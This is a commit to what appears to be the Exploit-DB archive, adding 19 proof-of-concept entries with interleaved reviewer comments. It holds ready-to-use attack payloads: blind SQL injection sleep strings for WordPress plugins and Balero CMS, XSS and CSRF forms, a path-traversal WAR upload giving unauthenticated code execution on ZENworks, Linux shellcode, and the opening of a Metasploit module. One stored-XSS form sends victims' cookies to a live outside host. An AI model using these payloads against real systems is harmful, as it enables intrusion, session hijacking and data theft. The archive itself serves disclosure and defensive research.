DB: 2015-04-09

19 new exploits
Offensive Security 2015-04-09 08:36:09 +00:00
parent 9a45389171
commit 0607d0429f
20 changed files with 812 additions and 0 deletions

@ -33069,3 +33069,22 @@ id,file,description,date,author,platform,type,port
36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 'weblink_id' Parameter SQL Injection Vulnerability",2012-02-03,Am!r,php,webapps,0
36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 ActiveX Control 'LicenseName()' Method Buffer Overflow Vulnerability",2012-02-06,"Senator of Pirates",windows,dos,0
36663,platforms/linux/remote/36663.txt,"Apache HTTP Server <= 2.2.15 'mod_proxy' Reverse Proxy Security Bypass Vulnerability",2012-02-06,"Tomas Hoger",linux,remote,0
36664,platforms/php/webapps/36664.txt,"Vespa 0.8.6 'getid3.php' Local File Include Vulnerability",2012-02-06,T0x!c,php,webapps,0
36665,platforms/php/webapps/36665.txt,"Simple Groupware 0.742 'export' Parameter Cross Site Scripting Vulnerability",2012-02-07,"Infoserve Security Team",php,webapps,0
36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 DomainConfig.do operation Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0
36667,platforms/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 jsp/AddDC.jsp domainName Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0
36668,platforms/php/webapps/36668.txt,"eFront 3.6.10 'administrator.php' Cross Site Scripting Vulnerability",2012-02-07,"Chokri B.A",php,webapps,0
36670,platforms/hardware/remote/36670.txt,"D-Link ShareCenter Products Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",hardware,remote,0
36671,platforms/php/webapps/36671.txt,"WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability",2015-04-08,"Claudio Viviani",php,webapps,80
36672,platforms/lin_x86/shellcode/36672.asm,"Shellcode: Linux x86 Egg-hunter (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
36673,platforms/lin_x86/shellcode/36673.py,"Shellcode: Linux x86 Typewriter Shellcode Generator",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
36674,platforms/php/webapps/36674.txt,"Shareaholic 7.6.0.3 Persistent XSS",2015-04-08,"Kacper Szurek",php,webapps,80
36675,platforms/php/webapps/36675.txt,"Balero CMS 0.7.2 Multiple Blind SQL Injection Vulnerabilities",2015-04-08,LiquidWorm,php,webapps,80
36676,platforms/php/webapps/36676.html,"Balero CMS 0.7.2 Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,php,webapps,80
36677,platforms/php/webapps/36677.txt,"Wordpress Traffic Analyzer Plugin 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",php,webapps,80
36678,platforms/jsp/webapps/36678.txt,"ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",jsp,webapps,0
36679,platforms/windows/remote/36679.rb,"Solarwinds Firewall Security Manager 6.6.5 Client Session Handling",2015-04-08,metasploit,windows,remote,0
36680,platforms/hardware/remote/36680.txt,"Multiple Trendnet Camera Products Remote Security Bypass Vulnerability",2012-02-10,console-cowboys,hardware,remote,0
36681,platforms/multiple/remote/36681.txt,"Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability",2012-02-09,"Paul Nicolucci",multiple,remote,0
36682,platforms/php/dos/36682.php,"PHP PDORow Object Remote Denial Of Service Vulnerability",2011-09-24,anonymous,php,dos,0
36683,platforms/php/webapps/36683.txt,"Dolibarr 3.x 'adherents/fiche.php' SQL Injection Vulnerability",2012-02-10,"Benjamin Kunz Mejri",php,webapps,0
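
Review bot: the id column skips from 36668 to 36670, so 36669 is absent from this batch; the hunk header (+22 lines, 3 of them context) still gives 19 additions, matching the commit message, so the gap is a skipped id rather than a dropped row, but it deserves a word in the commit message. Style points: 36671 spells 'WordPress' while 36677 spells 'Wordpress'; 36677 and 36678 use a ' - ' separator the other rows do not; and the port column is 80 for some web application rows (36671, 36674 to 36677) but 0 for others such as 36678, which makes the column unreliable for filtering.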

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/51918/info
D-Link ShareCenter products are prone to multiple remote code-execution vulnerabilities.
Successful exploits will result in the execution of arbitrary code in the context of the affected application. Failed exploit attempts may result in a denial-of-service condition.
The following products are affected:
D-Link DNS-320 ShareCenter
D-Link DNS-325 ShareCenter
http://www.example.com/cgi-bin/system_mgr.cgi?cmd=cgi_sms_test&command1=ls
http://www.example.com/cgi-bin/discovery.cgi
http://www.example.com/cgi-bin/system_mgr.cgi?cmd=get_firm_v_xml
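
Review bot: the three request lines are listed without saying what each one demonstrates. Only the first is self-explanatory, a shell command passed in the 'command1' parameter of the cgi_sms_test command of system_mgr.cgi; discovery.cgi and get_firm_v_xml carry no description, and no firmware versions or fixed release are named for the DNS-320 and DNS-325. Suggest one line per URL stating the behaviour observed, plus the affected and fixed firmware from the BID, so an owner can match the entry against an inventory.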

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/51922/info
Multiple Trendnet Camera products are prone to a remote security-bypass vulnerability.
Successfully exploiting this issue will allow remote attackers to gain access to a live stream from the camera.
http://www.example.com/anony/mjpg.cgi
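
Review bot: the entry names no camera models or firmware versions even though the first line says 'Multiple Trendnet Camera products', and gives no fix reference; the single path /anony/mjpg.cgi is the whole technical content. Suggest carrying the product list over from the BID and stating which authentication the path bypasses, since that is what an owner needs in order to check exposure and confirm that a firmware update closes it.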

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51893/info
ManageEngine ADManager Plus is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ManageEngine ADManager Plus 5.2 Build 5210 is vulnerable; prior versions may also be affected.
#2 - POST http://www.example.com/DomainConfig.do?methodToCall=save HTTP/1.1 - DOMAIN_NAME=test&DOMAIN_CONTROLLER_NAME=testsrv&save=Add&operation="><script>alert(&#039;zsl&#039;)</script>&reset=
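
Review bot: this file and 36667.txt carry the same description block word for word and differ only in the PoC line, with the numbering reversed (this file holds '#2', the next one '#1'), which suggests one advisory split in two; either merge them or add a cross-reference and the original advisory URL. Also, the '&#039;' sequences in the operation parameter are HTML entities from the rendered source page, not the characters that were sent, so the line is not a faithful copy of the request.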

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51893/info
ManageEngine ADManager Plus is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ManageEngine ADManager Plus 5.2 Build 5210 is vulnerable; prior versions may also be affected.
#1 - GET http://www.example.com/jsp/AddDC.jsp?domainName="><script>alert(&#039;zsl&#039;)</script> HTTP/1.1
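
Review bot: identical description text to 36666.txt; the only new information is the GET line. The request shows the parameter (domainName on jsp/AddDC.jsp) but not whether the page requires an authenticated session, and that precondition is what sets the risk for an exposed ADManager instance; suggest stating it. The domainName value also carries the same '&#039;' HTML-entity artifact that appears in 36666.txt, so it is not the literal request either.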

platforms/jsp/webapps/36678.txt Executable file

@ -0,0 +1,69 @@
>> Remote code execution in Novell ZENworks Configuration Management 11.3.1
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 07/04/2015 / Last updated: 07/04/2015
>> Background on the affected product:
"Automate and accelerate your Windows 7 migration
Microsoft estimates that it can take more than 20 hours to migrate a
single machine to Windows 7. Novell ZENworks Configuration Management
is ready to dramatically accelerate and automate every aspect of your
Windows 7 migration efforts.
Boost user productivity
Use Novell ZENworks Configuration Management to make sure users always
have access to the resources they need regardless of where they work
or what devices they use.
Eliminate IT effort
Automatically enforce policies and dynamically manage resources with
identity-based management of users as well as devices.
Expand your freedom to choose
Manage the lifecycles of all your current and future assets, with full
support for Windows and Linux systems, Novell eDirectory, Active
Directory, and more.
Simplify deployment with virtual appliances
Slash deployment times with a convenient virtual appliance deployment option.
Enjoy a truly unified solution
Centralize the management of all your devices into a single, unified
and easy-to-use web-based ZENworks console—called ZENworks Control
Center."
This vulnerability is present in ZENworks Configuration Management
(ZCM) which is part of the ZENworks Suite.
A blast from the past? This is a similar vulnerability to ZDI-10-078 /
OSVDB-63412, but it abuses a different parameter of the same servlet.
However this time Novell:
- Did not bother issuing a security advisory to their customers.
- Did not credit me even though I did responsible disclosure.
- Refused to provide a CVE number for months.
- Did not update their ZENworks Suite Trial software with the fix (you
can download it now from their site, install and test the PoC /
Metasploit module).
- Does not list the fix in the ZCM 11.3.2 update information
(https://www.novell.com/support/kb/doc.php?id=7015776).
>> Technical details:
Vulnerability: Remote code execution via file upload and directory traversal
CVE-2015-0779
Constraints: none; no authentication or any other information needed
Affected versions: ZENworks Configuration Management 11.3.1 and below
POST /zenworks/UploadServlet?uid=../../../opt/novell/zenworks/share/tomcat/webapps/&filename=payload.war
<WAR file payload in the body>
The WAR file will be automatically deployed to the server (on certain
Windows and Linux installations the path can be "../webapps/"). A
Metasploit module that exploits this vulnerability has been released.
>> Fix:
Upgrade to version ZENworks Configuration Management 11.3.2.
[1]: https://github.com/pedrib/PoC/blob/master/generic/zenworks_zcm_rce.txt
[2]: https://github.com/rapid7/metasploit-framework/pull/5096
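
Review bot: the disclosure line '07/04/2015' is ambiguous between 7 April and 4 July (the CSV row uses 2015-04-08, so ISO form would settle it), and the footnotes [1] and [2] are defined at the end but never cited in the text; suggest citing [1] where the PoC is mentioned and [2] at 'A Metasploit module that exploits this vulnerability has been released'. The 'Fix' section should also say explicitly that 11.3.2 contains the fix even though the update notes do not list it, since the bullet above says exactly that and a reader who sees only the fix line may doubt the upgrade advice.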

@ -0,0 +1,23 @@
; Egg Hunter (20 bytes)
; - searches from current addr towards lower memory
; - marker: 0x5159 (push ecx,pop ecx)
; Paw Petersen, SLAE-656
; https://www.pawpetersen.dk/slae-assignment-3-egg-hunter-linux-x86/
global _start
section .text
_start:
jmp call_egghunter
egghunter:
pop ecx ; save addr ptr
sub ecx, 23 ; move addr ptr back
next:
cmp word [ecx], 0x5951 ; marker
loopnz next ; dec ecx, jump
jmp ecx ; jump to shellcode
call_egghunter:
call egghunter
; "\xeb\x0d\x59\x83\xe9\x17\x66\x81\x39\x51\x59\xe0"
; ”\xf9\xff\xe1\xe8\xee\xff\xff\xff"
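
Review bot: the header comment gives the marker as 0x5159 while the compare uses 0x5951; both describe the bytes 51 59 (push ecx, pop ecx), once in memory order and once as the little-endian word the cmp reads, and the comment should say which form it means. The 'jump to shellcode' comment is also imprecise: loopnz decrements ecx before it tests ZF, so on a match jmp ecx targets the byte before the marker word rather than the marker itself, and the comment should state that. Finally, the second byte-string line opens with a typographic quote (”) instead of a straight double quote, so the two comment lines do not paste together as one string.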

@ -0,0 +1,27 @@
#!/usr/bin/env python
# Typewriter Shellcode Generator
# Paw Petersen, SLAE-656
# https://www.pawpetersen.dk/typewriter-shellcode-generator-linux-x86/
import sys,struct
string = sys.argv[1]
length = struct.pack("<b",len(string)+1)
asm_string_chunk = ""
for chunk_start in range(0,len(string),4):
chunk = string[chunk_start:chunk_start+4]
if chunk_start+4 >= len(string):
if len(chunk) < 4:
asm_string_chunk = ("\x68"+struct.pack("<4s",chunk+"\x0a"*(4-len(chunk))))+asm_string_chunk
else:
asm_string_chunk = ("\x68"+struct.pack("<4s",chunk))+asm_string_chunk
asm_string_chunk = ("\x68"+struct.pack("<4s","\x0a"*4))+asm_string_chunk
else:
asm_string_chunk = ("\x68"+struct.pack("<4s",chunk))+asm_string_chunk
sc = asm_string_chunk+"\x31\xc9\xb1"+length+"\x51\xb8\x11\x11\x51\x08\x50\x31\xc0\x50\x54\x51\x89\xe6\x83\xc6\x14\x03\x74\x24\x10\x2b\x34\x24\x56\x89\xf1\xeb\x1c\xeb\x0c\x59\x59\xe2\xe8\x31\xdb\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\xa2\x8d\x5c\x24\x0c\x31\xc9\xcd\x80\xeb\xe6\x31\xd2\xb2\x01\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\xeb\xd4"
print '"' + ''.join('\\x%02x' % ord(c) for c in sc) + '";'
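
Review bot: the script is Python 2 only (print statement, str treated as bytes) and has two unchecked failure modes visible in its first lines: sys.argv[1] raises IndexError when no argument is given, and struct.pack("<b", len(string)+1) packs a signed byte, so an input of 127 characters or more raises struct.error instead of producing output. Suggest a usage message, an explicit length check with a clear error, and a header note that the padding byte is 0x0a.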

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/51939/info
Apache MyFaces is prone to a remote information-disclosure vulnerability.
Remote attackers can exploit this issue to obtain sensitive information that may aid in further attacks.
The following versions are affected:
Apache MyFaces 2.0.1 through 2.0.11
Apache MyFaces 2.1.0 through 2.1.5
http://www.example.com/faces/javax.faces.resource/web.xml?ln=../WEB-INF
http://www.example.com/faces/javax.faces.resource/web.xml?ln=..\\WEB-INF
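
Review bot: affected versions are listed but no fixed releases are, so a reader cannot tell which upgrade closes the issue; suggest adding them from the BID. The two URLs differ only in the separator used in the 'ln' value (../ versus ..\\), which the description does not explain, and the doubled backslash looks like escaping carried over from the source rather than the literal request; one sentence on why both forms are listed would make the entry self-explanatory.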

platforms/php/dos/36682.php Executable file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/51952/info
PHP is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause the web server to crash, denying service to legitimate users.
PHP 5.3.8 is vulnerable; other versions may also be affected.
<?php
// make a Pdo_Mysql statement before
$result = $stmt->fetch(PDO::FETCH_LAZY);
session_start();
$_SESSION['PDORow'] = $result;
?>
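
Review bot: the snippet is not self-contained: $stmt is never created (the comment only says to 'make a Pdo_Mysql statement before'), so the file cannot be run as given and a reviewer cannot tell which driver setup or query is needed to reproduce the crash. Suggest including the PDO connection, prepare() and execute() calls, and stating which PHP versions besides 5.3.8 were checked, since 'other versions may also be affected' is not actionable for a patching decision.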

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51878/info
Vespa is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
Vespa 0.8.6 is vulnerable; other versions may also be affected.
http://www.example.com/[ Path ]/getid3/getid3.php?include=[LFI]%00
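
Review bot: '[ Path ]' and '[LFI]' are placeholders the entry never defines, and the trailing %00 relies on null-byte truncation of include paths, which PHP removed in 5.3.4; the entry should state the PHP version the observation was made on, because 'Vespa 0.8.6 is vulnerable' alone does not tell a defender whether the request as written applies to their PHP build.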

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51882/info
Simple Groupware is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Simple Groupware 0.742 is vulnerable; other versions may also be affected.
http://www.example.com/SimpleGroupware_0.742/bin/index.php?export=<ScRiPt >alert(&#039;xss&#039;)</ScRiPt>
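
Review bot: the '&#039;' in the export value are HTML entities from the rendered source page, not the characters in the request, the same fidelity problem as in 36666.txt. The path segment SimpleGroupware_0.742 looks like the tester's installation directory rather than a fixed application path; a note to that effect would stop readers treating it as a required component of the URL.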

platforms/php/webapps/36668.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/51894/info
eFront is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
eFront 3.6.10 is vulnerable; other versions may also be affected.
http://www.example.com/communityplusplus/www/administrator.php?ctg=languages&ajax=languagesTable&
limit=200&offset=0&sort=active&order=asc&other=&filter=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22VulnerabilityLab%22%29%20%3C
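
Review bot: the PoC URL is wrapped onto two lines (the first ends at 'ajax=languagesTable&', the second starts at 'limit=200') with nothing marking it as one URL, so a reader copying line by line gets two broken requests; keep it on one line or add a continuation marker. The 'filter' value is also percent-encoded while the neighbouring entries use literal characters, so one encoding convention across the batch would help.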

platforms/php/webapps/36671.txt Executable file

@ -0,0 +1,90 @@
######################
# Exploit Title : WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
# Software Link : https://mega.co.nz/#!DJAEBLBS!IBiukGo-pirelHmsRV80xZDHIvpqZKtTIqsD8YrMf7U
# Date : 2015-04-05
# Tested on : Linux / Mozilla Firefox
######################
# Description
WordPress All In One WP Security & Firewall 3.9.0 suffers from Blind SQL Injection vulnerability
There are some pages with wordpress esc_sql function.
esc_sql is prone to Blind SQL Injection (discovered by Ryan Dewhurst - http://dewhurstsecurity.com/)
isset($_GET["orderby"]) ? $orderby = strip_tags($_GET["orderby"]): $orderby = '';
isset($_GET["order"]) ? $order = strip_tags($_GET["order"]): $order = '';
- admin/wp-security-list-404.php
$orderby = !empty($orderby) ? esc_sql($orderby) : 'id';
$order = !empty($order) ? esc_sql($order) : 'DESC';
...
...
$data = $wpdb->get_results("SELECT * FROM $events_table_name ORDER BY $orderby $order", ARRAY_A);
- admin/wp-security-list-login-fails.php
$orderby = !empty($orderby) ? esc_sql($orderby) : 'failed_login_date';
$order = !empty($order) ? esc_sql($order) : 'DESC';
$data = $wpdb->get_results("SELECT * FROM $failed_logins_table_name ORDER BY $orderby $order", ARRAY_A);
- admin/wp-security-list-acct-activity-php
$orderby = !empty($orderby) ? esc_sql($orderby) : 'login_date';
$order = !empty($order) ? esc_sql($order) : 'DESC';
$data = $wpdb->get_results("SELECT * FROM $login_activity_table ORDER BY $orderby $order LIMIT 50", ARRAY_A)
- admin/wp-security-list-locked-ip.php
$orderby = !empty($orderby) ? esc_sql($orderby) : 'failed_login_date';
$order = !empty($order) ? esc_sql($order) : 'DESC';
$data = $wpdb->get_results("SELECT * FROM $lockdown_table_name WHERE release_date > now() ORDER BY $orderby $order", ARRAY_A)
######################
# PoC
http://VICTIM//wp-admin/admin.php?page=aiowpsec&tab=tab3&orderby=user_id,(select * from (select(sleep(30)))a)&order=asc
######################
# Vulnerability Disclosure Timeline:
2015-04-05: Discovered vulnerability
2015-04-06: Vendor Notification
2015-04-06: Vendor Response/Feedback
2015-04-07: Vendor Send Fix/Patch (3.9.1)
2015-04-07: Public Disclosure
#######################
Discovered By : Claudio Viviani
http://www.homelab.it
http://ffhd.homelab.it (Free Fuzzy Hashes Database)
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################
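
Review bot: the third file name, 'admin/wp-security-list-acct-activity-php', should read 'admin/wp-security-list-acct-activity.php' (the other three end in .php), and the quoted get_results lines for that file and for wp-security-list-locked-ip.php are missing their closing semicolons, so the excerpts are not exact copies of the source. The root-cause statement is correct but could be sharper for a defender: esc_sql only escapes string delimiters, and these values land unquoted in an ORDER BY clause, where escaping cannot help; the fix is to whitelist 'orderby' against the table's column names and 'order' against ASC/DESC (WordPress provides sanitize_sql_orderby() for this), which is worth stating beside the 3.9.1 reference.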

platforms/php/webapps/36674.txt Executable file

@ -0,0 +1,67 @@
# Exploit Title: Shareaholic 7.6.0.3 XSS
# Date: 10-11-2014
# Software Link: https://wordpress.org/plugins/shareaholic/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9311
# Category: webapps
1. Description
ShareaholicAdmin::add_location is accessible for every registered user.
File: shareaholic\shareaholic.php
add_action('wp_ajax_shareaholic_add_location', array('ShareaholicAdmin', 'add_location'));
$_POST['location'] is not escaped.
File: shareaholic\admin.php
public static function add_location() {
$location = $_POST['location'];
$app_name = $location['app_name'];
ShareaholicUtilities::update_options(array(
'location_name_ids' => array(
$app_name => array(
$location['name'] => $location['id']
),
),
$app_name => array(
$location['name'] => 'on'
)
));
echo json_encode(array(
'status' => "successfully created a new {$location['app_name']} location",
'id' => $location['id']
));
die();
}
http://security.szurek.pl/shareaholic-7603-xss.html
2. Proof of Concept
Login as regular user (created using wp-login.php?action=register) then:
<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="shareaholic_add_location">
<input type="hidden" name="location[app_name]" value="recommendations">
<input type="hidden" name="location[name]" value="post_below_content">
XSS: <input type="text" name="location[id]" value="'><script>alert(String.fromCharCode(88,83,83));</script>">
<input type="submit" value="Hack!">
</form>
XSS will be visible for admin:
http://wordpress-install/wp-admin/admin.php?page=shareaholic-settings
3. Solution:
Update to version 7.6.1.0
https://downloads.wordpress.org/plugin/shareaholic.7.6.1.0.zip
https://blog.shareaholic.com/security-update-shareaholic-wordpress-plugin/
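
Review bot: the description blames $_POST['location'] not being escaped, but the quoted code shows two separate defects: the wp_ajax_shareaholic_add_location handler has no capability check or nonce, so any registered user reaches add_location(), and the stored 'id' value is later rendered on the settings page without output escaping. A fix note should cover both (current_user_can() and check_ajax_referer() on the handler, escaping on output); otherwise a reader may conclude that output escaping alone closes the issue. The date '10-11-2014' is ambiguous between 10 November and 11 October; ISO form would match the CSV.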

platforms/php/webapps/36675.txt Executable file

@ -0,0 +1,62 @@
?
Balero CMS v0.7.2 Multiple Blind SQL Injection Vulnerabilities
Vendor: BaleroCMS Software
Product web page: http://www.balerocms.com
Affected version: 0.7.2
Summary: Balero CMS is an open source project that can help you manage
the page of your company with just a few guided steps, minimizing the
costs that many companies make to have your advertising medium and/or
portal.
Desc: The application suffers from multiple blind SQL injection vulnerabilities
when input is passed to several POST parameters thru their affected modules
which are not properly sanitised before being returned to the user or used
in SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
Vulnerable POST parameters in affected modules:
-----------------------------------------------
- pages [admin]
- themes [admin]
- code [mod-languages]
- id [mod-blog, mod-virtual_page]
- title [mod-blog]
- a [mod-virtual_page]
- virtual_title [mod-virtual_page]
-----------------------------------------------
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5238
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5238.php
04.03.2015
--
csrf+bsqli poc:
<html>
<body>
<form action="http://localhost/balerocms/admin/edit_page/mod-virtual_page/id-11" method="POST">
<input type="hidden" name="virtual_title" value="ZSL" />
<input type="hidden" name="a" value="1" />
<input type="hidden" name="content" value="Testingus" />
<input type="hidden" name="_wysihtml5_mode" value="1" />
<input type="hidden" name="id" value="11' and benchmark (50000000,sha1(1))-- " />
<input type="hidden" name="submit_delete" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
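
Review bot: the file opens with a stray '?' on its own line, almost certainly a UTF-8 byte-order mark mangled in transfer, and it should be dropped. The PoC is a CSRF form posted to an /admin/ path, which implies an authenticated administrator has to submit it, yet the description says only that input 'is not properly sanitised'; stating that precondition and the CSRF aspect up front changes how a reader rates the risk. The date 04.03.2015 would also be clearer in ISO form (the CSV row uses 2015-04-08).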

@ -0,0 +1,60 @@
?<!--
Balero CMS v0.7.2 Multiple JS/HTML Injection Vulnerabilities
Vendor: BaleroCMS Software
Product web page: http://www.balerocms.com
Affected version: 0.7.2
Summary: Balero CMS is an open source project that can help you manage
the page of your company with just a few guided steps, minimizing the
costs that many companies make to have your advertising medium and/or
portal.
Desc: Input passed to the 'content' POST parameter and the cookie 'counter'
is not properly sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in context of an affected site.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5239
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5239.php
04.03.2015
-->
<html>
<body>
<script>
document.cookie="counter=1<script>confirm('XSS')</script>; path=/balerocms/";
</script>
</body>
</html>
csrf+stored xss+filter bypass+session hijack:
<html>
<body>
<form action="http://localhost/balerocms/admin/edit_delete_post/mod-blog" method="POST">
<input type="hidden" name="title" value="ZSL" />
<input type="hidden" name="content" value="pwned&lt;/textarea&gt;<s\cript>document.location="http://www.zeroscience.mk/pentest/cthief.php?cookie="+docu\ment.cookie;</s\cript>" />
<input type="hidden" name="files" value="joxy.poxy" />
<input type="hidden" name="delete_post[]" value="135" />
<input type="hidden" name="id" value="135" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
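
Review bot: the second PoC embeds a live third-party collection URL (http://www.zeroscience.mk/pentest/cthief.php) in the stored payload; a database entry should not carry an exfiltration endpoint that runs against whoever tests it, so the host belongs behind a placeholder. The stray '?' before '<!--' is the same byte-order-mark artifact as in 36675.txt. The 'filter bypass' form (backslashes inside the tag names) is not explained anywhere in the description; one sentence on which filter it gets past would tell the vendor and defenders what to fix, rather than leaving them to patch the one string shown.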

platforms/php/webapps/36677.txt Executable file

@ -0,0 +1,47 @@
# Exploit Title: Wordpress plugin 'Traffic Analyzer' Blind SQL Injection
# Google Dork: inurl:/plugins/trafficanalyzer/js/
# Date: 4/7/2015
# Exploit Author: Dan King (@fuzztester)
# Vendor Homepage: http://wptrafficanalyzer.in/
# Software Link: https://wordpress.org/plugins/trafficanalyzer/
# Version: 3.4.2
# Tested on: Ubuntu 14.10 with Mysql and Wordpress 4.11
[+] Issue [+]
The Wordpress plugin "Traffic Analyzer" is vulnerable to a blind SQL injection vulnerability. The application does not properly validate input from the "Referer" HTTP header value.
[+] Impact [+]
This vulnerability would allow a remote attacker to access the database with the privleges configured by Wordpress. This could also lead to the attack gaining remote access to the webservers filesystem and further compromise the system hosting the Wordpress installation.
[+] Details [+]
The following section of PHP code is where the vulnerability exists. The $sql variable is a concatenated string intended on being used to insert data into the database. The the variable $referer is not checked for malicious data.
From 'class-TrafficAnalyzer.php' line number 297:
######################################################################################
$sql = " insert into $wpdb->prefix"."tanalyzer_pre ( hid,ip, script_name, user_agent, request_uri,resource_type,browser,resource,http_referer,wpta_cookie ) values ".
" ('".$hid."'," .
" '".$_SERVER["REMOTE_ADDR"]."', ".
"'".$_SERVER['SCRIPT_NAME']."', " .
" '".$_SERVER["HTTP_USER_AGENT"]."', ".
" '". $_SERVER['REQUEST_URI']. "', ".
" '".$resource_type."', " .
" '".$browser."', " .
" '".$resource ."', " .
" '".$referer . "', " .
" '".$this->wpta_cookie . "'" .
" )";
###########################################################################################
[+] Proof of Concept [+]
Sending the following HTTP request to a vulnerable site will cause the request to be delayed for 30 seconds.
GET /[wordpress path]/ HTTP/1.1
Host: x.x.x.x
Referer: BLAH'||(SELECT 'Fdsf' FROM DUAL WHERE 5435=5435 and SLEEP(30) )||'
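
Review bot: the quoted insert shows that $referer is only one of several values concatenated straight into the statement; $_SERVER["HTTP_USER_AGENT"] and $_SERVER['REQUEST_URI'] are built a few lines above in exactly the same way, so a fix that validates only the Referer header leaves the same pattern in place. The recommendation should be $wpdb->insert() or $wpdb->prepare() with placeholders for every value. Text issues: 'privleges' for 'privileges', 'the attack gaining' for 'the attacker gaining', 'The the variable', and 'Wordpress 4.11' is not a WordPress release (presumably 4.1.1).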

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51956/info
Dolibarr is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Dolibarr 3.2.0 Alpha is vulnerable; other versions may also be affected.
http://www.example.com/adherents/fiche.php?rowid=-1%27
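
Review bot: the affected line says 'Dolibarr 3.2.0 Alpha' while the CSV row for 36683 says 'Dolibarr 3.x'; the two should agree, and no fixed version is given. The PoC is only an error-based probe (rowid=-1'), so the entry shows the unescaped parameter but not the data-access impact the description claims; a note on whether adherents/fiche.php needs an authenticated session would complete the risk picture.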

platforms/windows/remote/36679.rb Executable file

@ -0,0 +1,241 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability",
'Description' => %q{
This module exploits multiple vulnerabilities found in Solarwinds Firewall Security Manager
6.6.5. The first vulnerability is an authentication bypass via the Change Advisor interface
due to a user-controlled session.putValue API in userlogin.jsp, allowing the attacker to set
the 'username' attribute before authentication. The second problem is that the settings-new.jsp
file will only check the 'username' attribute before authorizing the 'uploadFile' action,
which can be exploited and allows the attacker to upload a fake xls host list file to the
server, and results in arbitrary code execution under the context of SYSTEM.
Depending on the installation, by default the Change Advisor web server is listening on port
48080 for an express install. Otherwise, this service may appear on port 8080.
Solarwinds has released a fix for this vulnerability as FSM-v6.6.5-HotFix1.zip. You may
download it from the module's References section.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod', # Original discovery
'mr_me <steventhomasseeley[at]gmail.com>', # https://twitter.com/ae0n_
'sinn3r' # Metasploit
],
'References' =>
[
['CVE', '2015-2284'],
['OSVDB', '81634'],
['ZDI', '15-107'],
